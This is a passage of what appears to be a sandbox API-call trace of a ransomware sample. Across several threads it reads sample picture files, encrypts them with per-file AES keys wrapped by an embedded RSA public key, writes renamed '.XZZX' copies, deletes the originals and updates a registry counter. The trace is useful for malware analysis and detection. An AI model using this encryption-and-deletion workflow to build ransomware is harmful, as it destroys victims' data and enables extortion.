lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x425dfe4 | out: phkResult=0x425dfe4*=0x8dc) returned 0x0 [0145.447] RegQueryValueExW (in: hKey=0x8dc, lpValueName="E1010314", lpReserved=0x0, lpType=0x425dfd8, lpData=0x425dfec, lpcbData=0x425dfdc*=0x4 | out: lpType=0x425dfd8*=0x4, lpData=0x425dfec*=0xd4, lpcbData=0x425dfdc*=0x4) returned 0x0 [0145.447] RegCloseKey (hKey=0x8dc) returned 0x0 [0145.447] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x425dfe8 | out: phkResult=0x425dfe8*=0x8dc) returned 0x0 [0145.448] RegSetValueExW (in: hKey=0x8dc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x425dfec*=0xd5, cbData=0x4 | out: lpData=0x425dfec*=0xd5) returned 0x0 [0145.448] RegCloseKey (hKey=0x8dc) returned 0x0 [0145.448] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.448] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.448] CloseHandle (hObject=0x88c) returned 1 [0145.457] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0145.458] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0145.458] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg")) returned 1 [0145.458] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg")) returned 0 Thread: id = 519 os_tid = 0xb7c [0145.117] lstrcpyA (in: lpString1=0x48dfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0145.117] lstrcpyW (in: lpString1=0x48df460, lpString2="Penguins.jpg" | out: lpString1="Penguins.jpg") returned="Penguins.jpg" [0145.117] lstrcpyW (in: lpString1=0x48de860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0145.117] SetErrorMode (uMode=0x1) returned 0x1 [0145.117] lstrcpyW (in: lpString1=0x48df860, lpString2="Penguins.jpg" | out: lpString1="Penguins.jpg") returned="Penguins.jpg" [0145.117] CoCreateGuid (in: pguid=0x48de440 | out: pguid=0x48de440*(Data1=0xf8f2d4b7, Data2=0xf170, Data3=0x4f9f, Data4=([0]=0x8a, [1]=0x40, [2]=0x54, [3]=0x76, [4]=0xde, [5]=0x75, [6]=0xb0, [7]=0x1d))) returned 0x0 [0145.117] wsprintfW (in: param_1=0x48dec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0145.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x48dfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0145.117] wsprintfW (in: param_1=0x48de450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\847D57104B178490F8F2D4B74FA568D8.XZZX") returned 82 [0145.117] StrStrW (lpFirst="Penguins.jpg", lpSrch="XZZX") returned 0x0 [0145.117] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", dwFileAttributes=0x20) returned 1 [0145.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8e0 [0145.118] ReadFile (in: hFile=0x8e0, lpBuffer=0x4560020, nNumberOfBytesToRead=0xbde6b, lpNumberOfBytesRead=0x48de418, lpOverlapped=0x0 | out: lpBuffer=0x4560020*, lpNumberOfBytesRead=0x48de418*=0xbde6b, lpOverlapped=0x0) returned 1 [0145.126] CloseHandle (hObject=0x8e0) returned 1 [0145.126] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0145.127] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4110000 [0145.127] SetErrorMode (uMode=0x1) returned 0x1 [0145.127] lstrcpyW (in: lpString1=0x48de358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0145.127] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x437a250) returned 1 [0145.130] CryptGenKey (in: hProv=0x437a250, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11dd8) returned 1 [0145.560] CryptExportKey (in: hKey=0x3d11dd8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x48de41c | out: pbData=0x0*, pdwDataLen=0x48de41c*=0x94) returned 1 [0145.560] CryptExportKey (in: hKey=0x3d11dd8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4110000, pdwDataLen=0x48de41c | out: pbData=0x4110000*, pdwDataLen=0x48de41c*=0x94) returned 1 [0145.560] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0145.560] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0145.560] CryptDestroyKey (hKey=0x3d11dd8) returned 1 [0145.561] CryptReleaseContext (hProv=0x437a3e8, dwFlags=0x0) returned 0 [0145.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\847D57104B178490F8F2D4B74FA568D8.XZZX" (normalized: "c:\\users\\public\\pictures\\sample pictures\\847d57104b178490f8f2d4b74fa568d8.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8ec [0145.564] WriteFile (in: hFile=0x8ec, lpBuffer=0x4560020*, nNumberOfBytesToWrite=0xbde6b, lpNumberOfBytesWritten=0x48de438, lpOverlapped=0x0 | out: lpBuffer=0x4560020*, lpNumberOfBytesWritten=0x48de438*=0xbde6b, lpOverlapped=0x0) returned 1 [0145.652] SetFilePointer (in: hFile=0x8ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbde6b [0145.652] WriteFile (in: hFile=0x8ec, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x48de438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x48de438*=0x5, lpOverlapped=0x0) returned 1 [0145.652] SetFilePointer (in: hFile=0x8ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbde70 [0145.653] WriteFile (in: hFile=0x8ec, lpBuffer=0x48df860*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x48de438, lpOverlapped=0x0 | out: lpBuffer=0x48df860*, lpNumberOfBytesWritten=0x48de438*=0x18, lpOverlapped=0x0) returned 1 [0145.653] SetFilePointer (in: hFile=0x8ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbde88 [0145.653] WriteFile (in: hFile=0x8ec, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x48de438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x48de438*=0x5, lpOverlapped=0x0) returned 1 [0145.653] SetFilePointer (in: hFile=0x8ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbde8d [0145.653] SetErrorMode (uMode=0x1) returned 0x1 [0145.653] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0145.653] OutputDebugStringW (lpOutputString="end") [0145.653] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----vX\x8aÊ\x03`Õ\x8d\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x48ddbf4, pcbBinary=0x48dd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x48ddbf4, pcbBinary=0x48dd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0145.653] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x48ddbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x48dd3dc, pcbStructInfo=0x48dd3d8 | out: pvStructInfo=0x48dd3dc, pcbStructInfo=0x48dd3d8) returned 1 [0145.653] CryptAcquireContextW (in: phProv=0x48dd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x48dd3e4*=0x437a4f8) returned 1 [0145.654] CryptImportPublicKeyInfo (in: hCryptProv=0x437a4f8, dwCertEncodingType=0x1, pInfo=0x3cf2fe0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf3010*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf3018*, PublicKey.cUnusedBits=0x0), phKey=0x48dd3ec | out: phKey=0x48dd3ec*=0x3d11998) returned 1 [0145.654] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0145.655] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0145.655] CryptEncrypt (in: hKey=0x3d11998, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x48dd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x48dd3f0*=0x80) returned 1 [0145.655] CryptEncrypt (in: hKey=0x3d11998, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x437a580*, pdwDataLen=0x48dd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x437a580*, pdwDataLen=0x48dd3e8*=0x80) returned 1 [0145.655] WriteFile (in: hFile=0x8ec, lpBuffer=0x437a580*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x48de438, lpOverlapped=0x0 | out: lpBuffer=0x437a580*, lpNumberOfBytesWritten=0x48de438*=0x80, lpOverlapped=0x0) returned 1 [0145.655] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0145.655] WriteFile (in: hFile=0x8ec, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x48de438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x48de438*=0x5, lpOverlapped=0x0) returned 1 [0145.655] GetUserNameW (in: lpBuffer=0x48de1f8, pcbBuffer=0x48ddfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x48ddfe0) returned 1 [0145.656] wsprintfW (in: param_1=0x48ddff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0145.656] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x48ddfe4 | out: phkResult=0x48ddfe4*=0x8f0) returned 0x0 [0145.656] RegQueryValueExW (in: hKey=0x8f0, lpValueName="E1010314", lpReserved=0x0, lpType=0x48ddfd8, lpData=0x48ddfec, lpcbData=0x48ddfdc*=0x4 | out: lpType=0x48ddfd8*=0x4, lpData=0x48ddfec*=0xd5, lpcbData=0x48ddfdc*=0x4) returned 0x0 [0145.656] RegCloseKey (hKey=0x8f0) returned 0x0 [0145.656] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x48ddfe8 | out: phkResult=0x48ddfe8*=0x8f0) returned 0x0 [0145.656] RegSetValueExW (in: hKey=0x8f0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x48ddfec*=0xd6, cbData=0x4 | out: lpData=0x48ddfec*=0xd6) returned 0x0 [0145.656] RegCloseKey (hKey=0x8f0) returned 0x0 [0145.656] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.657] VirtualFree (lpAddress=0x4110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.657] CloseHandle (hObject=0x8ec) returned 1 [0145.671] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0145.671] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0145.671] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg")) returned 1 [0145.672] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg")) returned 0 Thread: id = 520 os_tid = 0xb80 [0145.363] lstrcpyA (in: lpString1=0x471fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0145.363] lstrcpyW (in: lpString1=0x471f460, lpString2="Tulips.jpg" | out: lpString1="Tulips.jpg") returned="Tulips.jpg" [0145.363] lstrcpyW (in: lpString1=0x471e860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0145.363] SetErrorMode (uMode=0x1) returned 0x1 [0145.363] lstrcpyW (in: lpString1=0x471f860, lpString2="Tulips.jpg" | out: lpString1="Tulips.jpg") returned="Tulips.jpg" [0145.363] CoCreateGuid (in: pguid=0x471e440 | out: pguid=0x471e440*(Data1=0x78d17041, Data2=0x1f6d, Data3=0x42e7, Data4=([0]=0xb4, [1]=0x56, [2]=0x19, [3]=0x69, [4]=0xbe, [5]=0x75, [6]=0x84, [7]=0xe9))) returned 0x0 [0145.363] wsprintfW (in: param_1=0x471ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0145.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x471fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0145.363] wsprintfW (in: param_1=0x471e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\CDC4AAAD0836755B78D170410CA859A3.XZZX") returned 82 [0145.363] StrStrW (lpFirst="Tulips.jpg", lpSrch="XZZX") returned 0x0 [0145.363] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", dwFileAttributes=0x20) returned 1 [0145.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x894 [0145.459] ReadFile (in: hFile=0x894, lpBuffer=0x4120020, nNumberOfBytesToRead=0x97958, lpNumberOfBytesRead=0x471e418, lpOverlapped=0x0 | out: lpBuffer=0x4120020*, lpNumberOfBytesRead=0x471e418*=0x97958, lpOverlapped=0x0) returned 1 [0145.466] CloseHandle (hObject=0x894) returned 1 [0145.466] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0145.466] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0145.466] SetErrorMode (uMode=0x1) returned 0x1 [0145.466] lstrcpyW (in: lpString1=0x471e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0145.466] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x437a3e8) returned 1 [0145.470] CryptGenKey (in: hProv=0x437a3e8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11e58) returned 1 [0145.703] CryptExportKey (in: hKey=0x3d11e58, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x471e41c | out: pbData=0x0*, pdwDataLen=0x471e41c*=0x94) returned 1 [0145.703] CryptExportKey (in: hKey=0x3d11e58, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x471e41c | out: pbData=0x40a0000*, pdwDataLen=0x471e41c*=0x94) returned 1 [0145.703] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0145.703] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0145.704] CryptDestroyKey (hKey=0x3d11e58) returned 1 [0145.704] CryptReleaseContext (hProv=0x437a3e8, dwFlags=0x0) returned 0 [0145.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\CDC4AAAD0836755B78D170410CA859A3.XZZX" (normalized: "c:\\users\\public\\pictures\\sample pictures\\cdc4aaad0836755b78d170410ca859a3.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8e4 [0145.707] WriteFile (in: hFile=0x8e4, lpBuffer=0x4120020*, nNumberOfBytesToWrite=0x97958, lpNumberOfBytesWritten=0x471e438, lpOverlapped=0x0 | out: lpBuffer=0x4120020*, lpNumberOfBytesWritten=0x471e438*=0x97958, lpOverlapped=0x0) returned 1 [0145.767] SetFilePointer (in: hFile=0x8e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x97958 [0145.767] WriteFile (in: hFile=0x8e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x471e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x471e438*=0x5, lpOverlapped=0x0) returned 1 [0145.767] SetFilePointer (in: hFile=0x8e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9795d [0145.767] WriteFile (in: hFile=0x8e4, lpBuffer=0x471f860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x471e438, lpOverlapped=0x0 | out: lpBuffer=0x471f860*, lpNumberOfBytesWritten=0x471e438*=0x14, lpOverlapped=0x0) returned 1 [0145.767] SetFilePointer (in: hFile=0x8e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x97971 [0145.767] WriteFile (in: hFile=0x8e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x471e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x471e438*=0x5, lpOverlapped=0x0) returned 1 [0145.767] SetFilePointer (in: hFile=0x8e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x97976 [0145.767] SetErrorMode (uMode=0x1) returned 0x1 [0145.767] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0145.767] OutputDebugStringW (lpOutputString="end") [0145.768] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õq\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x471dbf4, pcbBinary=0x471d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x471dbf4, pcbBinary=0x471d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0145.768] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x471dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x471d3dc, pcbStructInfo=0x471d3d8 | out: pvStructInfo=0x471d3dc, pcbStructInfo=0x471d3d8) returned 1 [0145.768] CryptAcquireContextW (in: phProv=0x471d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x471d3e4*=0x437a608) returned 1 [0145.768] CryptImportPublicKeyInfo (in: hCryptProv=0x437a608, dwCertEncodingType=0x1, pInfo=0x3cf30b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf30e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf30e8*, PublicKey.cUnusedBits=0x0), phKey=0x471d3ec | out: phKey=0x471d3ec*=0x4371fb8) returned 1 [0145.768] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0145.769] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0145.769] CryptEncrypt (in: hKey=0x4371fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x471d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x471d3f0*=0x80) returned 1 [0145.769] CryptEncrypt (in: hKey=0x4371fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x437a690*, pdwDataLen=0x471d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x437a690*, pdwDataLen=0x471d3e8*=0x80) returned 1 [0145.769] WriteFile (in: hFile=0x8e4, lpBuffer=0x437a690*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x471e438, lpOverlapped=0x0 | out: lpBuffer=0x437a690*, lpNumberOfBytesWritten=0x471e438*=0x80, lpOverlapped=0x0) returned 1 [0145.769] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0145.769] WriteFile (in: hFile=0x8e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x471e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x471e438*=0x5, lpOverlapped=0x0) returned 1 [0145.769] GetUserNameW (in: lpBuffer=0x471e1f8, pcbBuffer=0x471dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x471dfe0) returned 1 [0145.770] wsprintfW (in: param_1=0x471dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0145.770] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x471dfe4 | out: phkResult=0x471dfe4*=0x8fc) returned 0x0 [0145.770] RegQueryValueExW (in: hKey=0x8fc, lpValueName="E1010314", lpReserved=0x0, lpType=0x471dfd8, lpData=0x471dfec, lpcbData=0x471dfdc*=0x4 | out: lpType=0x471dfd8*=0x4, lpData=0x471dfec*=0xd6, lpcbData=0x471dfdc*=0x4) returned 0x0 [0145.770] RegCloseKey (hKey=0x8fc) returned 0x0 [0145.770] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", 